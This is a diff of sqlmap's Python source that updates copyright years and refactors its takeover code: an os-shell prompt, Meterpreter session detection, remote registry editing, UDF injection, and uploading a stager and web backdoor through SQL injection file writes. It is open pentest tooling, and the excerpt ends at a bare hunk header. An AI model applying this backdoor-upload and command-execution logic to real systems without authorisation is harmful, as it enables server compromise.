@ -128,5 +162,5 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||||
def _infinite_loop_check(self, req):
|
def _infinite_loop_check(self, req):
|
||||||
if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):
|
if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):
|
||||||
errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys())
|
errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys())
|
||||||
errMsg += "please check all provided parameters and/or provide missing ones."
|
errMsg += "Please check all provided parameters and/or provide missing ones"
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -13,7 +13,7 @@ def getPageTemplate(payload, place):
|
||||||
|
|
||||||
if payload and place:
|
if payload and place:
|
||||||
if (payload, place) not in kb.pageTemplates:
|
if (payload, place) not in kb.pageTemplates:
|
||||||
page, _ = Request.queryPage(payload, place, content=True)
|
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||||
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
|
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
|
||||||
|
|
||||||
retVal = kb.pageTemplates[(payload, place)]
|
retVal = kb.pageTemplates[(payload, place)]
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,19 +1,24 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isStackingAvailable
|
from lib.core.common import isStackingAvailable
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import OS
|
||||||
from lib.core.exception import SqlmapFilePathException
|
from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from lib.core.shell import autoCompletion
|
from lib.core.shell import autoCompletion
|
||||||
|
@ -116,13 +121,14 @@ class Abstraction(Web, UDF, Xp_cmdshell):
|
||||||
infoMsg += "'x' or 'q' and press ENTER"
|
infoMsg += "'x' or 'q' and press ENTER"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
autoCompletion(osShell=True)
|
autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
command = None
|
command = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
command = raw_input("os-shell> ")
|
command = raw_input("os-shell> ")
|
||||||
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print
|
print
|
||||||
errMsg = "user aborted"
|
errMsg = "user aborted"
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -65,7 +65,16 @@ class Metasploit:
|
||||||
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
|
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
|
||||||
|
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
_ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat"))
|
_ = conf.msfPath
|
||||||
|
while _:
|
||||||
|
if os.path.exists(os.path.join(_, "scripts")):
|
||||||
|
_ = os.path.join(_, "scripts", "setenv.bat")
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
old = _
|
||||||
|
_ = normalizePath(os.path.join(_, ".."))
|
||||||
|
if _ == old:
|
||||||
|
break
|
||||||
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
||||||
self._msfEncode = "ruby %s" % self._msfEncode
|
self._msfEncode = "ruby %s" % self._msfEncode
|
||||||
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
|
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
|
||||||
|
@ -510,7 +519,7 @@ class Metasploit:
|
||||||
timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT
|
timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT
|
||||||
|
|
||||||
if not initialized:
|
if not initialized:
|
||||||
match = re.search("session ([\d]+) opened", out)
|
match = re.search("Meterpreter session ([\d]+) opened", out)
|
||||||
|
|
||||||
if match:
|
if match:
|
||||||
self._loadMetExtensions(proc, match.group(1))
|
self._loadMetExtensions(proc, match.group(1))
|
||||||
|
@ -520,7 +529,6 @@ class Metasploit:
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
|
|
||||||
initialized = True
|
initialized = True
|
||||||
|
|
||||||
elif timeout:
|
elif timeout:
|
||||||
proc.kill()
|
proc.kill()
|
||||||
errMsg = "timeout occurred while attempting "
|
errMsg = "timeout occurred while attempting "
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -10,6 +10,7 @@ import os
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.enums import REGISTRY_OPERATION
|
||||||
|
|
||||||
class Registry:
|
class Registry:
|
||||||
"""
|
"""
|
||||||
|
@ -49,11 +50,11 @@ class Registry:
|
||||||
def _createLocalBatchFile(self):
|
def _createLocalBatchFile(self):
|
||||||
self._batPathFp = open(self._batPathLocal, "w")
|
self._batPathFp = open(self._batPathLocal, "w")
|
||||||
|
|
||||||
if self._operation == "read":
|
if self._operation == REGISTRY_OPERATION.READ:
|
||||||
lines = self._batRead
|
lines = self._batRead
|
||||||
elif self._operation == "add":
|
elif self._operation == REGISTRY_OPERATION.ADD:
|
||||||
lines = self._batAdd
|
lines = self._batAdd
|
||||||
elif self._operation == "delete":
|
elif self._operation == REGISTRY_OPERATION.DELETE:
|
||||||
lines = self._batDel
|
lines = self._batDel
|
||||||
|
|
||||||
for line in lines:
|
for line in lines:
|
||||||
|
@ -70,7 +71,7 @@ class Registry:
|
||||||
os.unlink(self._batPathLocal)
|
os.unlink(self._batPathLocal)
|
||||||
|
|
||||||
def readRegKey(self, regKey, regValue, parse=False):
|
def readRegKey(self, regKey, regValue, parse=False):
|
||||||
self._operation = "read"
|
self._operation = REGISTRY_OPERATION.READ
|
||||||
|
|
||||||
Registry._initVars(self, regKey, regValue, parse=parse)
|
Registry._initVars(self, regKey, regValue, parse=parse)
|
||||||
self._createRemoteBatchFile()
|
self._createRemoteBatchFile()
|
||||||
|
@ -90,7 +91,7 @@ class Registry:
|
||||||
return data
|
return data
|
||||||
|
|
||||||
def addRegKey(self, regKey, regValue, regType, regData):
|
def addRegKey(self, regKey, regValue, regType, regData):
|
||||||
self._operation = "add"
|
self._operation = REGISTRY_OPERATION.ADD
|
||||||
|
|
||||||
Registry._initVars(self, regKey, regValue, regType, regData)
|
Registry._initVars(self, regKey, regValue, regType, regData)
|
||||||
self._createRemoteBatchFile()
|
self._createRemoteBatchFile()
|
||||||
|
@ -103,7 +104,7 @@ class Registry:
|
||||||
self.delRemoteFile(self._batPathRemote)
|
self.delRemoteFile(self._batPathRemote)
|
||||||
|
|
||||||
def delRegKey(self, regKey, regValue):
|
def delRegKey(self, regKey, regValue):
|
||||||
self._operation = "delete"
|
self._operation = REGISTRY_OPERATION.DELETE
|
||||||
|
|
||||||
Registry._initVars(self, regKey, regValue)
|
Registry._initVars(self, regKey, regValue)
|
||||||
self._createRemoteBatchFile()
|
self._createRemoteBatchFile()
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
|
from lib.core.common import checkFile
|
||||||
from lib.core.common import dataToStdout
|
from lib.core.common import dataToStdout
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import isStackingAvailable
|
from lib.core.common import isStackingAvailable
|
||||||
|
@ -146,6 +147,7 @@ class UDF:
|
||||||
|
|
||||||
if len(self.udfToCreate) > 0:
|
if len(self.udfToCreate) > 0:
|
||||||
self.udfSetRemotePath()
|
self.udfSetRemotePath()
|
||||||
|
checkFile(self.udfLocalFile)
|
||||||
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
|
||||||
|
|
||||||
if written is not True:
|
if written is not True:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,6 +9,7 @@ import os
|
||||||
import posixpath
|
import posixpath
|
||||||
import re
|
import re
|
||||||
import StringIO
|
import StringIO
|
||||||
|
import urlparse
|
||||||
|
|
||||||
from tempfile import mkstemp
|
from tempfile import mkstemp
|
||||||
|
|
||||||
|
@ -17,8 +18,8 @@ from lib.core.agent import agent
|
||||||
from lib.core.common import arrayizeValue
|
from lib.core.common import arrayizeValue
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getDirs
|
from lib.core.common import getAutoDirectories
|
||||||
from lib.core.common import getDocRoot
|
from lib.core.common import getManualDirectories
|
||||||
from lib.core.common import getPublicTypeMembers
|
from lib.core.common import getPublicTypeMembers
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
@ -41,10 +42,12 @@ from lib.core.enums import DBMS
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import WEB_API
|
from lib.core.enums import WEB_API
|
||||||
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
|
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
|
||||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||||
from lib.core.settings import VIEWSTATE_REGEX
|
from lib.core.settings import VIEWSTATE_REGEX
|
||||||
from lib.request.connect import Connect as Request
|
from lib.request.connect import Connect as Request
|
||||||
|
from thirdparty.oset.pyoset import oset
|
||||||
|
|
||||||
|
|
||||||
class Web:
|
class Web:
|
||||||
|
@ -128,7 +131,7 @@ class Web:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _webFileInject(self, fileContent, fileName, directory):
|
def _webFileInject(self, fileContent, fileName, directory):
|
||||||
outFile = posixpath.normpath("%s/%s" % (directory, fileName))
|
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
|
||||||
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
||||||
query = ""
|
query = ""
|
||||||
|
|
||||||
|
@ -194,165 +197,166 @@ class Web:
|
||||||
self.webApi = choices[int(choice) - 1]
|
self.webApi = choices[int(choice) - 1]
|
||||||
break
|
break
|
||||||
|
|
||||||
kb.docRoot = arrayizeValue(getDocRoot())
|
directories = list(arrayizeValue(getManualDirectories()))
|
||||||
directories = sorted(getDirs())
|
directories.extend(getAutoDirectories())
|
||||||
|
directories = list(oset(directories))
|
||||||
|
|
||||||
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
|
||||||
|
|
||||||
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
|
||||||
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
||||||
success = False
|
success = False
|
||||||
|
|
||||||
for docRoot in kb.docRoot:
|
for directory in directories:
|
||||||
if success:
|
if not directory:
|
||||||
break
|
continue
|
||||||
|
|
||||||
for directory in directories:
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
uriPath = ""
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
||||||
|
|
||||||
if not all(isinstance(_, basestring) for _ in (docRoot, directory)):
|
uploaded = False
|
||||||
continue
|
directory = ntToPosixSlashes(normalizePath(directory))
|
||||||
|
|
||||||
directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/')
|
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
|
||||||
docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/')
|
directory = "/%s" % directory
|
||||||
|
else:
|
||||||
|
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
||||||
|
|
||||||
# '' or '/' -> 'docRoot'
|
if not directory.endswith('/'):
|
||||||
if not directory:
|
directory += '/'
|
||||||
localPath = docRoot
|
|
||||||
uriPath = '/'
|
|
||||||
# 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3'
|
|
||||||
elif not isWindowsDriveLetterPath(directory) and directory[0] != '/':
|
|
||||||
localPath = "%s/%s" % (docRoot, directory)
|
|
||||||
uriPath = "/%s" % directory
|
|
||||||
else:
|
|
||||||
localPath = directory
|
|
||||||
uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
|
||||||
|
|
||||||
if docRoot in uriPath:
|
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
|
||||||
uriPath = uriPath.replace(docRoot, "/")
|
infoMsg = "trying to upload the file stager on '%s' " % directory
|
||||||
uriPath = "/%s" % normalizePath(uriPath)
|
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
|
||||||
else:
|
logger.info(infoMsg)
|
||||||
webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url)
|
self._webFileInject(stagerContent, stagerName, directory)
|
||||||
|
|
||||||
if webDir:
|
for match in re.finditer('/', directory):
|
||||||
uriPath = "/%s" % webDir
|
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
|
||||||
else:
|
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
|
||||||
continue
|
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
|
||||||
|
logger.debug(debugMsg)
|
||||||
localPath = posixpath.normpath(localPath).rstrip('/')
|
|
||||||
uriPath = posixpath.normpath(uriPath).rstrip('/')
|
|
||||||
|
|
||||||
# Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique
|
|
||||||
infoMsg = "trying to upload the file stager on '%s' " % localPath
|
|
||||||
infoMsg += "via LIMIT INTO OUTFILE technique"
|
|
||||||
logger.info(infoMsg)
|
|
||||||
self._webFileInject(stagerContent, stagerName, localPath)
|
|
||||||
|
|
||||||
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
|
|
||||||
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
|
|
||||||
self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/')
|
|
||||||
|
|
||||||
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
||||||
uplPage = uplPage or ""
|
uplPage = uplPage or ""
|
||||||
|
|
||||||
# Fall-back to UNION queries file upload technique
|
if "sqlmap file uploader" in uplPage:
|
||||||
if "sqlmap file uploader" not in uplPage:
|
uploaded = True
|
||||||
warnMsg = "unable to upload the file stager "
|
break
|
||||||
warnMsg += "on '%s'" % localPath
|
|
||||||
singleTimeWarnMessage(warnMsg)
|
|
||||||
|
|
||||||
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
# Fall-back to UNION queries file upload method
|
||||||
infoMsg = "trying to upload the file stager on '%s' " % localPath
|
if not uploaded:
|
||||||
infoMsg += "via UNION technique"
|
warnMsg = "unable to upload the file stager "
|
||||||
logger.info(infoMsg)
|
warnMsg += "on '%s'" % directory
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
handle, filename = mkstemp()
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||||
os.fdopen(handle).close() # close low level handle (causing problems later)
|
infoMsg = "trying to upload the file stager on '%s' " % directory
|
||||||
|
infoMsg += "via UNION method"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
with open(filename, "w+") as f:
|
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
|
||||||
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
|
||||||
_ = _.replace("WRITABLE_DIR", localPath.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else localPath)
|
|
||||||
f.write(utf8encode(_))
|
|
||||||
|
|
||||||
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
|
handle, filename = mkstemp()
|
||||||
|
os.fdopen(handle).close() # close low level handle (causing problems later)
|
||||||
|
|
||||||
|
with open(filename, "w+") as f:
|
||||||
|
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
|
||||||
|
_ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
|
||||||
|
f.write(utf8encode(_))
|
||||||
|
|
||||||
|
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
|
||||||
|
|
||||||
|
for match in re.finditer('/', directory):
|
||||||
|
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
|
||||||
|
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
|
||||||
|
|
||||||
|
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
|
||||||
uplPage = uplPage or ""
|
uplPage = uplPage or ""
|
||||||
|
|
||||||
if "sqlmap file uploader" not in uplPage:
|
if "sqlmap file uploader" in uplPage:
|
||||||
continue
|
uploaded = True
|
||||||
else:
|
break
|
||||||
continue
|
|
||||||
|
|
||||||
if "<%" in uplPage or "<?" in uplPage:
|
if not uploaded:
|
||||||
warnMsg = "file stager uploaded on '%s', " % localPath
|
continue
|
||||||
warnMsg += "but not dynamically interpreted"
|
|
||||||
logger.warn(warnMsg)
|
if "<%" in uplPage or "<?" in uplPage:
|
||||||
|
warnMsg = "file stager uploaded on '%s', " % directory
|
||||||
|
warnMsg += "but not dynamically interpreted"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
continue
|
||||||
|
|
||||||
|
elif self.webApi == WEB_API.ASPX:
|
||||||
|
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
|
||||||
|
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
|
||||||
|
|
||||||
|
infoMsg = "the file stager has been successfully uploaded "
|
||||||
|
infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
if self.webApi == WEB_API.ASP:
|
||||||
|
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
|
||||||
|
|
||||||
|
if match:
|
||||||
|
backdoorDirectory = match.group(1)
|
||||||
|
else:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
elif self.webApi == WEB_API.ASPX:
|
_ = "tmpe%s.exe" % randomStr(lowercase=True)
|
||||||
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
|
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
|
||||||
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
|
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
|
||||||
|
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
|
||||||
|
self.webDirectory = backdoorDirectory
|
||||||
|
else:
|
||||||
|
continue
|
||||||
|
|
||||||
infoMsg = "the file stager has been successfully uploaded "
|
else:
|
||||||
infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl)
|
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
|
||||||
logger.info(infoMsg)
|
warnMsg = "backdoor has not been successfully uploaded "
|
||||||
|
warnMsg += "through the file stager possibly because "
|
||||||
|
warnMsg += "the user running the web server process "
|
||||||
|
warnMsg += "has not write privileges over the folder "
|
||||||
|
warnMsg += "where the user running the DBMS process "
|
||||||
|
warnMsg += "was able to upload the file stager or "
|
||||||
|
warnMsg += "because the DBMS and web server sit on "
|
||||||
|
warnMsg += "different servers"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if self.webApi == WEB_API.ASP:
|
message = "do you want to try the same method used "
|
||||||
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
|
message += "for the file stager? [Y/n] "
|
||||||
|
getOutput = readInput(message, default="Y")
|
||||||
|
|
||||||
if match:
|
if getOutput in ("y", "Y"):
|
||||||
backdoorDirectory = match.group(1)
|
self._webFileInject(backdoorContent, backdoorName, directory)
|
||||||
else:
|
else:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
_ = "tmpe%s.exe" % randomStr(lowercase=True)
|
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
|
||||||
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
|
self.webDirectory = directory
|
||||||
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
|
|
||||||
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
|
|
||||||
self.webDirectory = backdoorDirectory
|
|
||||||
else:
|
|
||||||
continue
|
|
||||||
|
|
||||||
else:
|
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
|
||||||
if not self.webUpload(backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath, content=backdoorContent):
|
|
||||||
warnMsg = "backdoor has not been successfully uploaded "
|
|
||||||
warnMsg += "through the file stager possibly because "
|
|
||||||
warnMsg += "the user running the web server process "
|
|
||||||
warnMsg += "has not write privileges over the folder "
|
|
||||||
warnMsg += "where the user running the DBMS process "
|
|
||||||
warnMsg += "was able to upload the file stager or "
|
|
||||||
warnMsg += "because the DBMS and web server sit on "
|
|
||||||
warnMsg += "different servers"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
|
|
||||||
message = "do you want to try the same method used "
|
testStr = "command execution test"
|
||||||
message += "for the file stager? [Y/n] "
|
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
||||||
getOutput = readInput(message, default="Y")
|
|
||||||
|
|
||||||
if getOutput in ("y", "Y"):
|
if output == "0":
|
||||||
self._webFileInject(backdoorContent, backdoorName, localPath)
|
warnMsg = "the backdoor has been uploaded but required privileges "
|
||||||
else:
|
warnMsg += "for running the system commands are missing"
|
||||||
continue
|
raise SqlmapNoneDataException(warnMsg)
|
||||||
|
elif output and testStr in output:
|
||||||
|
infoMsg = "the backdoor has been successfully "
|
||||||
|
else:
|
||||||
|
infoMsg = "the backdoor has probably been successfully "
|
||||||
|
|
||||||
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
|
infoMsg += "uploaded on '%s' - " % self.webDirectory
|
||||||
self.webDirectory = localPath
|
infoMsg += self.webBackdoorUrl
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/')
|
success = True
|
||||||
|
|
||||||
testStr = "command execution test"
|
break
|
||||||
output = self.webBackdoorRunCmd("echo %s" % testStr)
|
|
||||||
|
|
||||||
if output and testStr in output:
|
|
||||||
infoMsg = "the backdoor has been successfully "
|
|
||||||
else:
|
|
||||||
infoMsg = "the backdoor has probably been successfully "
|
|
||||||
|
|
||||||
infoMsg += "uploaded on '%s' - " % self.webDirectory
|
|
||||||
infoMsg += self.webBackdoorUrl
|
|
||||||
logger.info(infoMsg)
|
|
||||||
|
|
||||||
success = True
|
|
||||||
|
|
||||||
break
|
|
||||||
|
|
|
@ -1,12 +1,13 @@
|
